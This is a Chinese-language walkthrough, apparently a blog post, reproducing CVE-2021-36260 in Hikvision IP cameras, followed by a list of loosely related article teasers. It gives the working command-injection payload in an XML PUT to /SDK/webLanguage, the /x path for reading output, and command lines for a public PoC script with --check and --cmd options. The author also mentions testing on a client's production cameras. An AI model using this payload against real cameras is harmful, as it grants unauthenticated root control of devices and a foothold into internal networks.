海康摄像头CVE-2021-36260漏洞复现
海康摄像头CVE-2021-36260漏洞复现
- 1.漏洞介绍
- 2.手动测试
- 2.1.摄像头版本
- 2.2.漏洞复现
- 2.2.1.更改URL
- 2.2.2.抓包修改数据
- 2.2.3.更换请求路径
- 2.2.4.后期利用
- 3.POC测试
- 3.1.下载POC
- 3.2.运行POC
- 3.3.测试漏洞
- 3.4.执行命令
1.漏洞介绍
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。
该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS 服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
通告链接:CVE-2021-36260
2.手动测试
2.1.摄像头版本
版本可以具体的去观察一下,通过测试者的描述该漏洞在2016年其实就有了,只是一致没有被披露出来。
参考链接:参考文章
在界面中是能够看到有多少年的,比如我所在的客户现场就有很多的2019以及2020的摄像头,当然我这是内网,也没有对外映射,就是平常自己测试。正常来说应该在21年的年中之前的摄像头都可能会存在该问题。
2.2.漏洞复现
漏洞点位于:/SDK/webLanguage,利用PUT方法上传xml数据。
命令:<?xml version='1.0' encoding='utf-8'?><language>$(Command > webLib/x)</language>
- 1
2.2.1.更改URL
这里首先需要将浏览器的访问链接修改至/SDK/webLanguage,访问的url就是:http://IP地址/SDK/webLanguage,访问完成后会出现这样的页面,在这个页面进行刷新抓包。
2.2.2.抓包修改数据
这里我们通过抓包后,把数据包放入重放器中,由于后续的操作还需用到。在重放器中把之前提到的代码粘贴进去,然后发送。这里的抓到的包可能会由于浏览器不同所表示出来的形式也不同,可以进行向后面测试。
2.2.3.更换请求路径
当发送成功后,就需要更换发送路径了,把路径修改为/x。也就是在重放器中将原来/SDK/webLanguage的位置替换为/x,然后发送就可以看到数据了。
2.2.4.后期利用
这里的后期利用,我就不演示了,都是linux系统,放一些linux命令进行执行就可以了。由于我是在生产环境就不测试了。
3.POC测试
这里就是使用网上公开的POC进行测试。
3.1.下载POC
链接:POC
3.2.运行POC
首先将脚本下载下来,使用python3运行,这里需要注意的是一定要在python脚本的当前目录下运行。
3.3.测试漏洞
这里的测试漏洞,就是测试是否存在漏洞,适合一些点到为止的人,在安全巡检中使用。
命令:python CVE-2021-36260.py --rhost IP地址 --rport 80 --check
- 1
3.4.执行命令
这里只是测试了一下是否能够输出目录文件,并没有向后测试,也是由于我在生产环境中,弄坏了,还要找人修,就没有向后测试,当然测试到这里也就表明了漏洞的存在以及是能够被利用的,我的使命也就完成了。
命令:python CVE-2021-36260.py --rhost IP地址 --rport 80 --cmd "ls -al"
- 1
海康摄像头CVE-2021-36260漏洞复现相关推荐
- 海康摄像头的二次开发(java)
海康摄像头的二次开发(java) 我第一次接触海康摄像头的二次开发的项目,一开始的时候摸不清套路,走了不少弯路,现在准备把我的一些经验留下来,让大家参考一下. 1.首先到海康的官网下载设备网络SDK: ...
- 两个rtsp同时抓流_海康摄像头同时添加到两台海康硬盘录像机上
相信大家都有这种经历,我我为啥要多买两个摄像头呀,我直接一个摄像头添加到两台硬盘录像机上不香吗? 海康摄像头一般不建议同时添加到超过三台录像机,由于取流限制~ 那么如何同时添加到两台海康录像机上呢? ...
- 海康摄像头取、录像机RTSP视频流的字串格式
海康摄像头取.录像机RTSP视频流的字串格式 主码流 rtsp://IP:554/h264/ch1/main/av_stream rtsp://IP:554/ISAPI/streaming/chann ...
- php对接海康视频教程_EasyNVR无插件互联网直播平台对接海康摄像头如何通过SDK将视频在前端网页播放...
原标题:EasyNVR无插件互联网直播平台对接海康摄像头如何通过SDK将视频在前端网页播放 市场上常见的海康.大华.宇视等网络摄像头只要支持RTSP协议,都可以接入到EasyNVR中,今天主要给大家分 ...
- linux开机自动启动(自启动)脚本、程序(初始化脚本)(海康摄像头自启动程序)
文章目录 原 20220225 寻找海康摄像头armv7l自启动脚本 /etc/init.d/rcS /etc/init.d/rc.local /etc/profile /usr/etc/rc.loc ...
- onvif协议_大华的录像机添加海康摄像头,使用了onvif协议,为啥也添加不进去?...
大华的录像机添加海康摄像头在监控项目中经常会遇到,有很多的项目我们使用并不是同一个厂家的设备. 前段时间我们弱电vip技术2群中讨论到一个问题,关于大华的录像机添加海康摄像头为什么总是不成功,很多情况 ...
- 海康摄像头恢复出厂监控录像视频恢复
"你好,我这边海康的摄像头恢复出厂了,能恢复前段时间的一些视频数据么?" 海康威视作为中国领先的监控产品供应商之一,海康的监控录像机使用极其广泛,而监控通过摄像头的录制将数据存储到 ...
- 海康摄像头忘记密码,自己如何快速重置密码
海康摄像头,自助重置密码. 一.摄像头忘记密码情况 在项目工程中,有各种各样的原因,导致摄像头密码忘记,有的时安装时安装工程商没有把密码留下来,有的是客户自己设置了密码后忘记了密码,还有的是客户买的新 ...
- 浏览器显示海康摄像头实时预览画面纯前端解决方案
浏览器显示海康摄像头实时预览画面纯前端解决方案 将海康设备的 rtsp 协议视频流通过 ffmpeg 转码为 flv 实时视频流,并将实时视频流通过 express 服务生成 http 长链接或 ws ...
最新文章
- Forefront_TMG_2010-TMG发布Web服务器
- B树、B-树、B+树、B*树
- Windows Phone 7 隔离存储空间“.NET研究”资源管理器
- 【洛谷P1538】迎春舞会之数字舞蹈
- BERT、MT-DNN、GPT2.0、ERNIE
- linux mint安装步骤,Linux mint 安装步骤
- 栈溢出笔记1.3 准备Shellcode
- xtrabackup备份mysql5.7_【 xtrabackup】CentOS7.x上基于 MySQL 5.7.x的XtraBackup 安装与备份还原...
- 23种设计模式之组合模式
- python旋转地球源代码_90行代码让微信地球转起来,太酷了!(python实现)
- 关于serv-u公网访问出现“打开ftp服务器上的文件夹时发生错误。请检查是否有权限访问该文件夹。详细信息:操作超时”的解决方法...
- shell脚本执行冲突事件-sshwhile
- linux桥接命令virsh,CentOS6.3 KVM如何设置网卡为桥接模式
- Eigen教程(11)之存储顺序
- Ubuntu系统中docker本地镜像的位置
- IAR FOR STM8 学习笔记 固件库 GPIO
- [BZOJ 3709] Bohater
- 深信服AC1100上网行为管理
- 高德地图开放平台(js免费引入)
- 面试问题 你如何评价你上一家公司,你觉的上一家公司怎么评价你